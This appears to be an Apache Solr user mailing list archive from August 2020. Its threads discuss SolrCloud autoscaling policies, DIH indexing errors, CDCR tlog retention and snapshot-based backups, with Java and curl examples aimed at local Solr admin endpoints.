I see there's a writeMap method in the Policy class however I can't find how to 
use it.
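
For reference, the JSON-over-HTTP route mentioned in the original question below looks
roughly like this; the node address and the policy clause are placeholders only:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class SetClusterPolicy {
  public static void main(String[] args) throws Exception {
    // Example payload only; put your real clauses in the set-cluster-policy array.
    String body = "{\"set-cluster-policy\": ["
        + "{\"replica\": \"<2\", \"shard\": \"#EACH\", \"node\": \"#ANY\"}"
        + "]}";
    HttpRequest req = HttpRequest.newBuilder(URI.create("http://localhost:8983/solr/admin/autoscaling"))
        .header("Content-Type", "application/json")
        .POST(HttpRequest.BodyPublishers.ofString(body))
        .build();
    HttpResponse<String> rsp = HttpClient.newHttpClient()
        .send(req, HttpResponse.BodyHandlers.ofString());
    System.out.println(rsp.statusCode() + " " + rsp.body());
  }
}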

Thanks in advance


From: Howard Gonzalez 
Sent: Friday, August 21, 2020 12:45 PM
To: solr-user@lucene.apache.org 
Subject: How to Write Autoscaling Policy changes to Zookeeper/SolrCloud using 
the autoscaling Java API

Hello. I am trying to use the autoscaling Java API to write some cluster policy 
changes to a Zookeeper/SolrCloud cluster. However, I can't find the right way 
to do it. I can get all the autoscaling cluster policy clauses using:

autoScalingConfig.getPolicy.getClusterPolicy

However, after getting all the right List of clauses, I don't know how to write 
those changes to the Zookeeper/Solr cluster using the Java API.

Any guidance please? I know I can use the HTTP solr client to send a json 
request, but just wondering how to do it using the provided Java API.

Thanks in advance


How to Write Autoscaling Policy changes to Zookeeper/SolrCloud using the autoscaling Java API

2020-08-21 Thread Howard Gonzalez
Hello. I am trying to use the autoscaling Java API to write some cluster policy 
changes to a Zookeeper/SolrCloud cluster. However, I can't find the right way 
to do it. I can get all the autoscaling cluster policy clauses using:

autoScalingConfig.getPolicy.getClusterPolicy

However, after getting all the right List of clauses, I don't know how to write 
those changes to the Zookeeper/Solr cluster using the Java API.

Any guidance please? I know I can use the HTTP solr client to send a json 
request, but just wondering how to do it using the provided Java API.

Thanks in advance


Re: Solrcloud tlog are not deleted

2020-08-14 Thread Jérôme ROUCOU
Hello,

Thanks for your reply.

Yes, the CDCR buffer is disable when we check it.

We finally found that the increase of tlog files was due to the version of
Zookeeper used. We re-installed Zookeeper in the same version as the one
embedded by Solr, and this fixed the problem of non-deleted tlogs.


Regards,
Jérôme


On Tue, Aug 11, 2020 at 12:48, Dominique Bejean wrote:

> Hi,
>
> Did you disable CDCR buffer ?
> solr//cdcr?action=DISABLEBUFFER
>
> You can check with "cdcr?action=STATUS"
>
> Regards
>
> Dominique
>
>
> Le mar. 11 août 2020 à 10:57, Michel Bamouni  a
> écrit :
>
>> Hello,
>>
>>
>> We had setup a synchronization between our solr instances on 2
>> datacenters by using  the CDCR.
>> until now, every thing worked fine but after an upgrade from solr 7.3 to
>> solr 7.7, we are facing an issue.
>> Indeed, our tlog files are not deleted even if we see the new values on
>> the  two solr.
>> It is like that the hard commit doesn't occur.
>> In our solrconfig.xml file, we had configure the autocommit as below :
>>
>>
>> 
>>   ${solr.autoCommit.maxTime:15000}
>>   false
>> 
>>
>>
>> and the softautocommit looks like that:
>>
>> 
>>   ${solr.autoSoftCommit.maxTime:-1}
>> 
>>
>>
>> if someone has already meet this issue, I'm looking for your return.
>>
>>
>> Best regards,
>>
>>
>> Michel
>>
>>


Re: DIH on SolrCloud

2020-08-14 Thread Jan Høydahl
DIH should run fine from any node. It sends update requests like any other client,
and those are routed to the leader, wherever it is. It could be problematic if node 2
gets overloaded by doing DIH work, Overseer work and perhaps shard leader work
all at once; an overloaded node gets into all kinds of problems with ZooKeeper etc.

The first thing I'd do, while preparing to replace DIH with something else outside
your cluster, is to get up to a recent Solr version. Version 4.10 has a lot of known
issues wrt SolrCloud stability.

Jan

> 14. aug. 2020 kl. 03:55 skrev Issei Nishigata :
> 
> Thank you for your quick reply.
> Can I make sure that the indexing isn't conducted on the node where the DIH
> executed but conducted on the Leader node, right?
> 
> As far as I have seen a log, there are errors: the failed establishment of
> connection occurred from Node2 on the state of Replica on running DIH to
> Node9 where on the state of Replica.
> Therefore, for my understanding, I thought there would be errors when the
> DIH was implemented at the Node2 and trying to forward a tlog to Node9.
> 
> Unless Node9 receives the tlog, if Node1 as Leader receives the tlog, I do
> believe there are no worries because Node9 is synchronised with Node1.
> But if Node1 as Leader cannot receive the tlog, Replica might be
> synchronised to the Leader soon and that makes me a problematic issue.
> I want to try to find out the cause as I will check all log files of all
> servers through, but could you give me your comment for my understanding of
> the indexing architecture on SolrCloud, please?
> 
> 
> Thanks,
> Issei
> 
> 2020年8月14日(金) 0:33 Jörn Franke :
> 
>> DIH is deprecated in current Solr versions. The general recommendation is
>> to do processing outside the Solr server and use the update handler (the
>> normal one, not Cell) to add documents to the index. So you should avoid
>> using it as it is not future proof .
>> 
>> If you need more Time to migrate to a non-DIH solution:
>> I recommend to look at all log files of all servers to find the real error
>> behind the issue. If you trigger in Solr cloud mode DIH from node 2 that
>> does not mean it is executed there !
>> 
>> What could to wrong:
>> Other nodes do not have access to files/database or there is a parsing
>> error or a script error.
>> 
>>> Am 13.08.2020 um 17:21 schrieb Issei Nishigata :
>>> 
>>> Hi, All
>>> 
>>> I'm using Solr4.10 with SolrCloud mode.
>>> I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I
>> will
>>> call this Node1 to Node10 for convenience)
>>> -> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
>>> Indexing always uses DIH of Node2. Therefore, DIH may be executed when
>>> Node2 is Leader or Replica.
>>> Node2 is not forcibly set to Leader when DIH is executed.
>>> 
>>> At one point, when Node2 executed DIH in the Replica state, the following
>>> error in Node9 occurred.
>>> 
>>> 
>> [updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
>>> - org.apache.solr.client.solrj.SolrServerException: IOException occured
>>> when talking to server at:
>> http://samplehost:8983/solr/test_shard1_replica9
>>> 
>>> I think this is the error while sending data from Node2 to Node9. And
>> Node9
>>> couldn't respond for some reason.
>>> 
>>> The error occurs sometimes however it is not reproducible so that the
>>> investigation is troublesome.
>>> Is there any possible cause for this problem? I am worrying about if it
>> is
>>> doing Solr anti-pattern.
>>> The thing is, when running DIH by Node2 as Replica, the above error
>> occurs
>>> towards Node1 as Leader,
>>> then soon after, all the nodes might be returning to the index of the
>>> Node1.
>>> Do you think my understanding makes sense?
>>> 
>>> If using DIH on SolrCloud is not recommended, please let me know about
>> this.
>>> 
>>> Thanks,
>>> Issei
>> 



Re: DIH on SolrCloud

2020-08-13 Thread Issei Nishigata
Thank you for your quick reply.
Just to confirm: the indexing isn't performed on the node where DIH was executed,
but on the Leader node, right?

As far as I can see in the log, there are errors showing that the connection from
Node2 (a Replica, running DIH) to Node9 (also a Replica) could not be established.
So my understanding is that the errors occurred when DIH was running on Node2 and
it tried to forward a tlog to Node9.

Even if Node9 does not receive the tlog, as long as Node1 (the Leader) receives it,
I believe there is nothing to worry about, because Node9 is synchronised with Node1.
But if Node1 as Leader cannot receive the tlog, the Replica might soon be
synchronised to the Leader anyway, and that is what worries me.
I will try to find the cause by checking all the log files on all servers, but could
you comment on whether my understanding of the indexing architecture on SolrCloud
is correct?


Thanks,
Issei

On Fri, Aug 14, 2020 at 0:33, Jörn Franke wrote:

> DIH is deprecated in current Solr versions. The general recommendation is
> to do processing outside the Solr server and use the update handler (the
> normal one, not Cell) to add documents to the index. So you should avoid
> using it as it is not future proof .
>
> If you need more Time to migrate to a non-DIH solution:
> I recommend to look at all log files of all servers to find the real error
> behind the issue. If you trigger in Solr cloud mode DIH from node 2 that
> does not mean it is executed there !
>
> What could to wrong:
> Other nodes do not have access to files/database or there is a parsing
> error or a script error.
>
> > Am 13.08.2020 um 17:21 schrieb Issei Nishigata :
> >
> > Hi, All
> >
> > I'm using Solr4.10 with SolrCloud mode.
> > I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I
> will
> > call this Node1 to Node10 for convenience)
> > -> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
> > Indexing always uses DIH of Node2. Therefore, DIH may be executed when
> > Node2 is Leader or Replica.
> > Node2 is not forcibly set to Leader when DIH is executed.
> >
> > At one point, when Node2 executed DIH in the Replica state, the following
> > error in Node9 occurred.
> >
> >
> [updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
> > - org.apache.solr.client.solrj.SolrServerException: IOException occured
> > when talking to server at:
> http://samplehost:8983/solr/test_shard1_replica9
> >
> > I think this is the error while sending data from Node2 to Node9. And
> Node9
> > couldn't respond for some reason.
> >
> > The error occurs sometimes however it is not reproducible so that the
> > investigation is troublesome.
> > Is there any possible cause for this problem? I am worrying about if it
> is
> > doing Solr anti-pattern.
> > The thing is, when running DIH by Node2 as Replica, the above error
> occurs
> > towards Node1 as Leader,
> > then soon after, all the nodes might be returning to the index of the
> > Node1.
> > Do you think my understanding makes sense?
> >
> > If using DIH on SolrCloud is not recommended, please let me know about
> this.
> >
> > Thanks,
> > Issei
>


Re: DIH on SolrCloud

2020-08-13 Thread Jörn Franke
DIH is deprecated in current Solr versions. The general recommendation is to do
processing outside the Solr server and use the update handler (the normal one,
not Cell) to add documents to the index. So you should avoid using it, as it is
not future proof.

If you need more time to migrate to a non-DIH solution:
I recommend looking at all log files of all servers to find the real error
behind the issue. If you trigger DIH from node 2 in SolrCloud mode, that does
not mean it is executed there!

What could go wrong:
Other nodes do not have access to the files/database, or there is a parsing error or
a script error.
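
As a rough illustration of that recommendation, here is a client-side indexing sketch
that reads rows over JDBC and pushes documents through the normal update handler via
SolrJ; the JDBC URL, credentials, collection and field names are all made up:

import java.sql.Connection;
import java.sql.DriverManager;
import java.sql.ResultSet;
import java.sql.Statement;
import java.util.Collections;
import java.util.Optional;

import org.apache.solr.client.solrj.impl.CloudSolrClient;
import org.apache.solr.common.SolrInputDocument;

public class JdbcIndexer {
  public static void main(String[] args) throws Exception {
    try (CloudSolrClient solr = new CloudSolrClient.Builder(
             Collections.singletonList("zk1:2181"), Optional.of("/solr")).build();
         Connection db = DriverManager.getConnection("jdbc:postgresql://dbhost/app", "user", "pass");
         Statement st = db.createStatement();
         ResultSet rs = st.executeQuery("SELECT id, title FROM docs")) {
      while (rs.next()) {
        SolrInputDocument doc = new SolrInputDocument();
        doc.addField("id", rs.getString("id"));
        doc.addField("title", rs.getString("title"));
        solr.add("mycollection", doc);   // SolrJ routes this to the correct shard leader
      }
      solr.commit("mycollection");
    }
  }
}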

> Am 13.08.2020 um 17:21 schrieb Issei Nishigata :
> 
> Hi, All
> 
> I'm using Solr4.10 with SolrCloud mode.
> I have 10 Nodes. one of Nodes is Leader Node, the others is Replica.(I will
> call this Node1 to Node10 for convenience)
> -> 1 Shard, 1 Leader(Node1), 9 Replica(Node2-10)
> Indexing always uses DIH of Node2. Therefore, DIH may be executed when
> Node2 is Leader or Replica.
> Node2 is not forcibly set to Leader when DIH is executed.
> 
> At one point, when Node2 executed DIH in the Replica state, the following
> error in Node9 occurred.
> 
> [updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
> - org.apache.solr.client.solrj.SolrServerException: IOException occured
> when talking to server at: http://samplehost:8983/solr/test_shard1_replica9
> 
> I think this is the error while sending data from Node2 to Node9. And Node9
> couldn't respond for some reason.
> 
> The error occurs sometimes however it is not reproducible so that the
> investigation is troublesome.
> Is there any possible cause for this problem? I am worrying about if it is
> doing Solr anti-pattern.
> The thing is, when running DIH by Node2 as Replica, the above error occurs
> towards Node1 as Leader,
> then soon after, all the nodes might be returning to the index of the
> Node1.
> Do you think my understanding makes sense?
> 
> If using DIH on SolrCloud is not recommended, please let me know about this.
> 
> Thanks,
> Issei


DIH on SolrCloud

2020-08-13 Thread Issei Nishigata
Hi, All

I'm using Solr 4.10 in SolrCloud mode.
I have 10 nodes: one node is the Leader and the others are Replicas (I will
call them Node1 to Node10 for convenience)
-> 1 shard, 1 Leader (Node1), 9 Replicas (Node2-10)
Indexing always uses the DIH on Node2, so DIH may be executed while
Node2 is either Leader or Replica.
Node2 is not forcibly made Leader when DIH is executed.

At one point, when Node2 executed DIH in the Replica state, the following
error in Node9 occurred.

[updateExecutor-1-thread-9737][ERROR][org.apache.solr.common.SolrException]
- org.apache.solr.client.solrj.SolrServerException: IOException occured
when talking to server at: http://samplehost:8983/solr/test_shard1_replica9

I think this is the error while sending data from Node2 to Node9. And Node9
couldn't respond for some reason.

The error occurs only sometimes and is not reproducible, so the
investigation is troublesome.
Is there any possible cause for this problem? I am worried that this setup
might be a Solr anti-pattern.
The thing is, when DIH runs on Node2 as a Replica and the above error occurs
towards Node1 as Leader,
then soon after, all the nodes might be brought back to the index of
Node1.
Do you think my understanding makes sense?

If using DIH on SolrCloud is not recommended, please let me know about this.

Thanks,
Issei


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Bram Van Dam
On 11/08/2020 13:15, Erick Erickson wrote:
> CDCR is being deprecated. so I wouldn’t suggest it for the long term.

Ah yes, thanks for pointing that out. That makes Dominique's alternative
less attractive. I guess I'll stick to my original proposal!

Thanks Erick :-)

 - Bram


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Dominique Bejean
An idea could be to use the autoscaling API to add a PULL replica for
each shard, located on one or more low-resource, backup-dedicated nodes on
separate hardware.
However, we would need to exclude these "PULL backup replicas" from searches.
Unfortunately, I am not aware of a way to do that.
For a better RPO, a TLOG replica would be preferable, but it could become an NRT
replica.

So, maybe one solution could be to create a new BACKUP replica type with
these characteristics:

   - according to the RPO, an option at creation time: based on PULL or TLOG
   sync mode
   - search disabled


Dominique



On Tue, Aug 11, 2020 at 14:07, Erick Erickson wrote:

> Dominique:
>
> Alternatives are under discussion, there isn’t a recommendation yet.
>
> Erick
>
> > On Aug 11, 2020, at 7:49 AM, Dominique Bejean 
> wrote:
> >
> > I missed that !
> > Are you aware about an alternative ?
> >
> > Regards
> >
> > Dominique
> >
> >
> > Le mar. 11 août 2020 à 13:15, Erick Erickson  a
> > écrit :
> >
> >> CDCR is being deprecated. so I wouldn’t suggest it for the long term.
> >>
> >>> On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh 
> >> wrote:
> >>>
> >>> I would love an answer to this too!
> >>>
> >>> On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam 
> >> wrote:
> >>>
> >>>> Hey folks,
> >>>>
> >>>> Been reading up about the various ways of creating backups. The whole
> >>>> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> >>>> our environment, so I've been looking for ways around that, and here's
> >>>> what I've come up with so far:
> >>>>
> >>>> 1. Stop applications from writing to solr
> >>>>
> >>>> 2. Commit everything
> >>>>
> >>>> 3. Identify a single core for each shard in each collection
> >>>>
> >>>> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
> >>>>
> >>>> 5. Once complete, re-enable application write access to Solr
> >>>>
> >>>> 6. Create a backup from these snapshots using the replication
> handler's
> >>>> backup function (replication?command=backup=mySnapshot)
> >>>>
> >>>> 7. Put the backups somewhere safe
> >>>>
> >>>> 8. Clean up snapshots
> >>>>
> >>>>
> >>>> This seems ... too good to be true? I've seen so many threads about
> how
> >>>> hard it is to create backups in SolrCloud on this mailing list over
> the
> >>>> years, but this seems pretty straightforward? Am I missing some
> >>>> glaringly obvious reason why this will fail catastrophically?
> >>>>
> >>>> Using Solr 7.7 in this case.
> >>>>
> >>>> Feedback much appreciated!
> >>>>
> >>>> Thanks,
> >>>>
> >>>> - Bram
> >>>>
> >>>
> >>> --
> >>> **
> >>> ** <https://www.canva.com/>Empowering the world to design
> >>> Share accurate
> >>> information on COVID-19 and spread messages of support to your
> community.
> >>>
> >>> Here are some resources
> >>> <
> >>
> https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates
> >
> >>
> >>> that can help.
> >>> <https://twitter.com/canva> <https://facebook.com/canva>
> >>> <https://au.linkedin.com/company/canva> <https://twitter.com/canva>
> >>> <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>
> >>> <https://instagram.com/canva>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>>
> >>
> >>
>
>


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Erick Erickson
Dominique:

Alternatives are under discussion, there isn’t a recommendation yet.

Erick

> On Aug 11, 2020, at 7:49 AM, Dominique Bejean  
> wrote:
> 
> I missed that !
> Are you aware about an alternative ?
> 
> Regards
> 
> Dominique
> 
> 
> Le mar. 11 août 2020 à 13:15, Erick Erickson  a
> écrit :
> 
>> CDCR is being deprecated. so I wouldn’t suggest it for the long term.
>> 
>>> On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh 
>> wrote:
>>> 
>>> I would love an answer to this too!
>>> 
>>> On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam 
>> wrote:
>>> 
>>>> Hey folks,
>>>> 
>>>> Been reading up about the various ways of creating backups. The whole
>>>> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
>>>> our environment, so I've been looking for ways around that, and here's
>>>> what I've come up with so far:
>>>> 
>>>> 1. Stop applications from writing to solr
>>>> 
>>>> 2. Commit everything
>>>> 
>>>> 3. Identify a single core for each shard in each collection
>>>> 
>>>> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>>>> 
>>>> 5. Once complete, re-enable application write access to Solr
>>>> 
>>>> 6. Create a backup from these snapshots using the replication handler's
>>>> backup function (replication?command=backup=mySnapshot)
>>>> 
>>>> 7. Put the backups somewhere safe
>>>> 
>>>> 8. Clean up snapshots
>>>> 
>>>> 
>>>> This seems ... too good to be true? I've seen so many threads about how
>>>> hard it is to create backups in SolrCloud on this mailing list over the
>>>> years, but this seems pretty straightforward? Am I missing some
>>>> glaringly obvious reason why this will fail catastrophically?
>>>> 
>>>> Using Solr 7.7 in this case.
>>>> 
>>>> Feedback much appreciated!
>>>> 
>>>> Thanks,
>>>> 
>>>> - Bram
>>>> 
>>> 
>>> --
>>> **
>>> ** <https://www.canva.com/>Empowering the world to design
>>> Share accurate
>>> information on COVID-19 and spread messages of support to your community.
>>> 
>>> Here are some resources
>>> <
>> https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
>> 
>>> that can help.
>>> <https://twitter.com/canva> <https://facebook.com/canva>
>>> <https://au.linkedin.com/company/canva> <https://twitter.com/canva>
>>> <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>
>>> <https://instagram.com/canva>
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>>> 
>> 
>> 



Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Dominique Bejean
I missed that !
Are you aware about an alternative ?

Regards

Dominique


On Tue, Aug 11, 2020 at 13:15, Erick Erickson wrote:

> CDCR is being deprecated. so I wouldn’t suggest it for the long term.
>
> > On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh 
> wrote:
> >
> > I would love an answer to this too!
> >
> > On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam 
> wrote:
> >
> >> Hey folks,
> >>
> >> Been reading up about the various ways of creating backups. The whole
> >> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> >> our environment, so I've been looking for ways around that, and here's
> >> what I've come up with so far:
> >>
> >> 1. Stop applications from writing to solr
> >>
> >> 2. Commit everything
> >>
> >> 3. Identify a single core for each shard in each collection
> >>
> >> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
> >>
> >> 5. Once complete, re-enable application write access to Solr
> >>
> >> 6. Create a backup from these snapshots using the replication handler's
> >> backup function (replication?command=backup=mySnapshot)
> >>
> >> 7. Put the backups somewhere safe
> >>
> >> 8. Clean up snapshots
> >>
> >>
> >> This seems ... too good to be true? I've seen so many threads about how
> >> hard it is to create backups in SolrCloud on this mailing list over the
> >> years, but this seems pretty straightforward? Am I missing some
> >> glaringly obvious reason why this will fail catastrophically?
> >>
> >> Using Solr 7.7 in this case.
> >>
> >> Feedback much appreciated!
> >>
> >> Thanks,
> >>
> >> - Bram
> >>
> >
> > --
> > **
> > ** <https://www.canva.com/>Empowering the world to design
> > Share accurate
> > information on COVID-19 and spread messages of support to your community.
> >
> > Here are some resources
> > <
> https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
>
> > that can help.
> > <https://twitter.com/canva> <https://facebook.com/canva>
> > <https://au.linkedin.com/company/canva> <https://twitter.com/canva>
> > <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>
> > <https://instagram.com/canva>
> >
> >
> >
> >
> >
> >
> >
> >
> >
> >
>
>


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Erick Erickson
CDCR is being deprecated, so I wouldn't suggest it for the long term.

> On Aug 10, 2020, at 9:33 PM, Ashwin Ramesh  wrote:
> 
> I would love an answer to this too!
> 
> On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam  wrote:
> 
>> Hey folks,
>> 
>> Been reading up about the various ways of creating backups. The whole
>> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
>> our environment, so I've been looking for ways around that, and here's
>> what I've come up with so far:
>> 
>> 1. Stop applications from writing to solr
>> 
>> 2. Commit everything
>> 
>> 3. Identify a single core for each shard in each collection
>> 
>> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>> 
>> 5. Once complete, re-enable application write access to Solr
>> 
>> 6. Create a backup from these snapshots using the replication handler's
>> backup function (replication?command=backup=mySnapshot)
>> 
>> 7. Put the backups somewhere safe
>> 
>> 8. Clean up snapshots
>> 
>> 
>> This seems ... too good to be true? I've seen so many threads about how
>> hard it is to create backups in SolrCloud on this mailing list over the
>> years, but this seems pretty straightforward? Am I missing some
>> glaringly obvious reason why this will fail catastrophically?
>> 
>> Using Solr 7.7 in this case.
>> 
>> Feedback much appreciated!
>> 
>> Thanks,
>> 
>> - Bram
>> 
> 
> -- 
> **
> ** <https://www.canva.com/>Empowering the world to design
> Share accurate 
> information on COVID-19 and spread messages of support to your community.
> 
> Here are some resources 
> <https://about.canva.com/coronavirus-awareness-collection/?utm_medium=pr_source=news_campaign=covid19_templates>
>  
> that can help.
> <https://twitter.com/canva> <https://facebook.com/canva> 
> <https://au.linkedin.com/company/canva> <https://twitter.com/canva>  
> <https://facebook.com/canva>  <https://au.linkedin.com/company/canva>  
> <https://instagram.com/canva>
> 
> 
> 
> 
> 
> 
> 
> 
> 
> 



Re: Solrcloud tlog are not deleted

2020-08-11 Thread Dominique Bejean
Hi,

Did you disable CDCR buffer ?
solr/<collection>/cdcr?action=DISABLEBUFFER

You can check with "cdcr?action=STATUS"
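
If it helps, the same two calls from Java (hypothetical host and collection name):

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class CdcrCheck {
  public static void main(String[] args) throws Exception {
    HttpClient http = HttpClient.newHttpClient();
    String base = "http://localhost:8983/solr/mycollection/cdcr";
    for (String action : new String[] {"DISABLEBUFFER", "STATUS"}) {
      HttpRequest req = HttpRequest.newBuilder(URI.create(base + "?action=" + action)).GET().build();
      // Prints the raw JSON response for each CDCR action
      System.out.println(action + " -> " + http.send(req, HttpResponse.BodyHandlers.ofString()).body());
    }
  }
}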

Regards

Dominique


On Tue, Aug 11, 2020 at 10:57, Michel Bamouni wrote:

> Hello,
>
>
> We had setup a synchronization between our solr instances on 2 datacenters
> by using  the CDCR.
> until now, every thing worked fine but after an upgrade from solr 7.3 to
> solr 7.7, we are facing an issue.
> Indeed, our tlog files are not deleted even if we see the new values on
> the  two solr.
> It is like that the hard commit doesn't occur.
> In our solrconfig.xml file, we had configure the autocommit as below :
>
>
> 
>   ${solr.autoCommit.maxTime:15000}
>   false
> 
>
>
> and the softautocommit looks like that:
>
> 
>   ${solr.autoSoftCommit.maxTime:-1}
> 
>
>
> if someone has already meet this issue, I'm looking for your return.
>
>
> Best regards,
>
>
> Michel
>
>


Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-11 Thread Dominique Bejean
  Hi,

This procedure looks fine, but it is a little complex to automate.

Why not consider a backup based on CDCR for SolrCloud, or on replication for
standalone Solr?

For SolrCloud, CDCR can be configured with source and target collections in
the same SolrCloud cluster. The target collection can have its shards
located on dedicated nodes and its replication factor set to 1.

You need to take care to locate the target nodes on separate hardware (VM
and storage) and ideally in separate geographical locations.

You will be able to achieve a very good RPO and RTO.
If the RTO requirement is not demanding, the dedicated backup-destination nodes
can have little CPU and RAM.
If the RTO requirement is demanding, we can imagine the backup collection becoming
the live collection very quickly instead of running a restore, or serving in a
degraded search-only mode during the restore.

Regards.

Dominique



On Thu, Aug 6, 2020 at 16:18, Bram Van Dam wrote:

> Hey folks,
>
> Been reading up about the various ways of creating backups. The whole
> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> our environment, so I've been looking for ways around that, and here's
> what I've come up with so far:
>
> 1. Stop applications from writing to solr
>
> 2. Commit everything
>
> 3. Identify a single core for each shard in each collection
>
> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>
> 5. Once complete, re-enable application write access to Solr
>
> 6. Create a backup from these snapshots using the replication handler's
> backup function (replication?command=backup=mySnapshot)
>
> 7. Put the backups somewhere safe
>
> 8. Clean up snapshots
>
>
> This seems ... too good to be true? I've seen so many threads about how
> hard it is to create backups in SolrCloud on this mailing list over the
> years, but this seems pretty straightforward? Am I missing some
> glaringly obvious reason why this will fail catastrophically?
>
> Using Solr 7.7 in this case.
>
> Feedback much appreciated!
>
> Thanks,
>
>  - Bram
>


Solrcloud tlog are not deleted

2020-08-11 Thread Michel Bamouni
Hello,


We had set up synchronization between our Solr instances on 2 datacenters by
using CDCR.
Until now everything worked fine, but after an upgrade from Solr 7.3 to Solr
7.7 we are facing an issue.
Indeed, our tlog files are not deleted, even though we see the new values on the
two Solr instances.
It is as if the hard commit doesn't occur.
In our solrconfig.xml file, we had configured the autocommit as below:


<autoCommit>
  <maxTime>${solr.autoCommit.maxTime:15000}</maxTime>
  <openSearcher>false</openSearcher>
</autoCommit>


and the autoSoftCommit looks like this:

<autoSoftCommit>
  <maxTime>${solr.autoSoftCommit.maxTime:-1}</maxTime>
</autoSoftCommit>


If someone has already met this issue, I'd be glad to hear how you resolved it.


Best regards,


Michel



Re: Backups in SolrCloud using snapshots of individual cores?

2020-08-10 Thread Ashwin Ramesh
I would love an answer to this too!

On Fri, Aug 7, 2020 at 12:18 AM Bram Van Dam  wrote:

> Hey folks,
>
> Been reading up about the various ways of creating backups. The whole
> "shared filesystem for Solrcloud backups"-thing is kind of a no-go in
> our environment, so I've been looking for ways around that, and here's
> what I've come up with so far:
>
> 1. Stop applications from writing to solr
>
> 2. Commit everything
>
> 3. Identify a single core for each shard in each collection
>
> 4. Snapshot that core using CREATESNAPSHOT in the Collections API
>
> 5. Once complete, re-enable application write access to Solr
>
> 6. Create a backup from these snapshots using the replication handler's
> backup function (replication?command=backup=mySnapshot)
>
> 7. Put the backups somewhere safe
>
> 8. Clean up snapshots
>
>
> This seems ... too good to be true? I've seen so many threads about how
> hard it is to create backups in SolrCloud on this mailing list over the
> years, but this seems pretty straightforward? Am I missing some
> glaringly obvious reason why this will fail catastrophically?
>
> Using Solr 7.7 in this case.
>
> Feedback much appreciated!
>
> Thanks,
>
>  - Bram
>




Replication not occurring to newly added SOLRCloud nodes

2020-08-10 Thread Shane Brooks
Main info: SOLRCloud 7.7.3, Zookeeper 3.4.14

I have a 2 node SOLRCloud installation, 3 zookeeper instances, configured in 
AWS to autoscale. I am currently testing with 9 collections. My issue is that 
when I scale out and a node is added to the SOLRCloud cluster,
I get replication to the new node from only one of the 9 collections.

https://i.imgur.com/xR7PQxf.gif


autoAddReplicas=true for each of the 9 collections.


I have set the following rules:

# maintain 2 replicas of each shard
curl -X POST "http://localhost:8983/solr/admin/autoscaling" --data-binary \
'{
  "set-cluster-policy": [
{ "replica": "2","shard": "#EACH", "node": "#ANY" }
  ]
}'


# listen for a nodeAdded event and upon 5 seconds of receiving begin 
replicating our existing collection(s) to the new node.
curl -X POST "http://localhost:8983/solr/admin/autoscaling" --data-binary \
'{
  "set-trigger": {
"name": "node_added_trigger",
"event": "nodeAdded",
"waitFor": "5s",
"preferredOperation": "ADDREPLICA"
  }
}'



All of the collections were set up identically. What else do I need to do to 
automatically force replication to nodes when they are added to the cluster?

Thanks in advance,
Shane Brooks



Backups in SolrCloud using snapshots of individual cores?

2020-08-06 Thread Bram Van Dam
Hey folks,

Been reading up about the various ways of creating backups. The whole
"shared filesystem for Solrcloud backups"-thing is kind of a no-go in
our environment, so I've been looking for ways around that, and here's
what I've come up with so far:

1. Stop applications from writing to solr

2. Commit everything

3. Identify a single core for each shard in each collection

4. Snapshot that core using CREATESNAPSHOT in the Collections API

5. Once complete, re-enable application write access to Solr

6. Create a backup from these snapshots using the replication handler's
backup function (replication?command=backup&commitName=mySnapshot)

7. Put the backups somewhere safe

8. Clean up snapshots
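
For what it's worth, a rough sketch of steps 2, 4, 6 and 8 driven from Java against
the documented HTTP APIs; the host, collection, core, snapshot and backup location
names below are all made up:

import java.net.URI;
import java.net.http.HttpClient;
import java.net.http.HttpRequest;
import java.net.http.HttpResponse;

public class SnapshotBackup {
  static final HttpClient HTTP = HttpClient.newHttpClient();
  static final String BASE = "http://localhost:8983/solr";   // hypothetical node

  public static void main(String[] args) throws Exception {
    // 2. Commit everything
    get(BASE + "/mycollection/update?commit=true");
    // 4. Snapshot the collection (Collections API CREATESNAPSHOT)
    get(BASE + "/admin/collections?action=CREATESNAPSHOT&collection=mycollection&commitName=mySnapshot");
    // 6. Back up one core per shard from that snapshot via the replication handler
    get(BASE + "/mycollection_shard1_replica_n1/replication?command=backup"
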